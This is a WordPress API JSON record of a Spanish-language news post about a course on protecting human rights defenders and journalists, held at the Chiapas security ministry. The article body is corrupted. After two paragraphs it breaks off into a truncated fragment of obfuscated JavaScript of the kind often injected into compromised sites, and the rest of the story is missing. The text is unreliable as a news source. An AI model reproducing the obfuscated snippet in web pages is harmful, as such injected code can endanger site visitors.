{"id":10500,"date":"2023-06-12T02:39:59","date_gmt":"2023-06-12T02:39:59","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=10500"},"modified":"2023-06-12T02:40:00","modified_gmt":"2023-06-12T02:40:00","slug":"se-imparte-en-ssypc-curso-de-mecanismo-de-proteccion-para-personas-defensoras-de-derechos-humanos-y-periodistas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=10500","title":{"rendered":"Se imparte en SSyPC Curso de Mecanismo de Protecci\u00f3n para Personas Defensoras de Derechos Humanos y Periodistas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"575\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/Se-imparte-en-SSyPC-Curso-de-Mecanismo-de-Proteccion-para-Personas-Defensoras-de-Derechos-Humanos-y-Periodistas-2-1024x575.jpeg\" alt=\"\" class=\"wp-image-10501\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/Se-imparte-en-SSyPC-Curso-de-Mecanismo-de-Proteccion-para-Personas-Defensoras-de-Derechos-Humanos-y-Periodistas-2-1024x575.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/Se-imparte-en-SSyPC-Curso-de-Mecanismo-de-Proteccion-para-Personas-Defensoras-de-Derechos-Humanos-y-Periodistas-2-300x168.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/Se-imparte-en-SSyPC-Curso-de-Mecanismo-de-Proteccion-para-Personas-Defensoras-de-Derechos-Humanos-y-Periodistas-2-768x431.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/Se-imparte-en-SSyPC-Curso-de-Mecanismo-de-Proteccion-para-Personas-Defensoras-de-Derechos-Humanos-y-Periodistas-2-1536x862.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/Se-imparte-en-SSyPC-Curso-de-Mecanismo-de-Proteccion-para-Personas-Defensoras-de-Derechos-Humanos-y-Periodistas-2.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>11 de Junio del 2023. Tuxtla<strong> Guti\u00e9rrez, Chiapas.-<\/strong>\u00a0En la Secretar\u00eda de Seguridad y Protecci\u00f3n Ciudadana se llev\u00f3 a cabo el &#8220;Curso de Mecanismo de Protecci\u00f3n para Personas Defensoras de Derechos Humanos y Periodistas&#8221;, dirigido a personal operativo, jur\u00eddico y del \u00e1rea de Derechos Humanos de esta instituci\u00f3n de seguridad, mismo que fue impartido por Alan Iram Paz Arellano, director de Pol\u00edtica P\u00fablica de la Direcci\u00f3n General para la Protecci\u00f3n de Personas Defensoras de Derechos Humanos y Periodistas de la Secretar\u00eda de Gobernaci\u00f3n.<\/p>\n\n\n\n<p>En este marco, Paz Arellano reconoci\u00f3 la disposici\u00f3n de la SSyPC para llevar a cabo este curso dise\u00f1ado para brindar herramientas \u00fatiles a los cuerpos policiales y personal administrativo que realizan labores de preservar la libertad, el orden y la paz p\u00fablica.<br><\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>11 de Junio del 2023. Tuxtla Guti\u00e9rrez, Chiapas.-\u00a0En la Secretar\u00eda de Seguridad y Protecci\u00f3n Ciudadana se llev\u00f3 a cabo el &#8220;Curso de Mecanismo de Protecci\u00f3n para Personas Defensoras de Derechos Humanos y Periodistas&#8221;, dirigido a personal operativo, jur\u00eddico y del \u00e1rea de Derechos Humanos de esta instituci\u00f3n de seguridad, mismo que fue impartido por Alan &hellip;<\/p>\n","protected":false},"author":2,"featured_media":10501,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-10500","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10500","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=10500"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10500\/revisions"}],"predecessor-version":[{"id":10502,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10500\/revisions\/10502"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/10501"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=10500"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=10500"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=10500"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}